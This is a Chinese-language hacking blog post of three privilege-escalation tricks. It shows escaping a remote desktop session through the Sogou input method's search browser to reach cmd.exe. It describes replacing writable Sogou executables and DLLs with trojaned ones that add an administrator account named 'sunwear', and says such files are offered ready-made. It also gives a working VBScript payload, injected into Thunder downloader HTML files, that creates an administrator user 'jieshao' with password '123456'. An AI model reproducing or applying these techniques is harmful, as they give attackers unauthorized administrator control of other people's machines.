几个小牛技巧。。

好久不关注黑客方面的东西了。无意在网上碰着几个小技巧。。很好。值得一看

简单的说就是利用sougou输入法远程关机。

测试环境win7旗舰

输入法版本4.

3389登陆远程机的时候, 切换到搜狗输入法, 任意输入东西,然后点击search(搜索)然后会开iexplorer.exe 然后你可以在地址栏输入系统目录,调出cmd.exe

2.搜狗输入法提权

朋友提权上遇到困难,2003系统,常规方法都无效。能访问的目录只有网站目录和C:ProgramFiles。所以我仔细看了下ProgramFiles的所有文件夹,搜狗输入法的目录(C:ProgramFilesSogouInput4。3。0。3315)是唯一一个有权限写入编辑的目录。那么替换里面的执行文件就是目前唯一方法了。

  乍看这目录,显然自动升级程序pinyinup。exe应该是首选,在自己机器上测试了一下,用计算器替换了源文件,不过等了半天不运行,重启也一样。虽然肯定会运行,但还是希望有更有效率的方法。仔细看了一下,每次启动系统后,搜狗的ImeUtil。exe都会启动,那就替换它了,结果肯定是成功的。但感觉不够,越多可换的就越好。让效率达到最高。这时觉得这种简单的事情应该有人已经做过了,百度一下取取经,不出所料,已经有人这么做过了,这位仁兄替换的也是PinyinUp。exe,但这样就满足了,没有继续了。

  除了imeutil。exe,pinyinup。exe之外还有几个DLL文件。肯定是要加载的。找了popup。dll下手,做好的popup。dll替换了原先的,重启测试,执行了。如果替换3个的话,我想达到效果的速度会快一些

  做了个imeutil。exe和popup。dll,供懒人使用,建议替换之前先备份原文件,达到目的后恢复原状。成功执行的话会在系统中添加一个管理员,用户名和密码都是sunwear

3.迅雷提权



迅雷提权(图)—-by:杰少

by:杰少

当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,

把我们所下载东西添加到列表当中。

所对应的htm文件有2处一处是C:Program FilesThunder NetworkThunderProgramgeturl.htm

一处是C:Program FilesThunder NetworkThunderProgramgetAllurl.htm

如果我们想把我们想要的代码添加进去执行了?

我们简单写个代码试试,代码如下:

<script language=”VBScript”>

Set vbs=CreateObject(“Wscript.Shell”)

vbs.run “cmd /c net user jieshao 123456 /add”,0

vbs.run “cmd /c net localgroup administrators jieshao /add”,0

</script>

应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样

会去执行我们的代码。添加一个administrators组的一个用户jieshao

当然,代码大家可以自定义哈。不要被我所禁锢住啦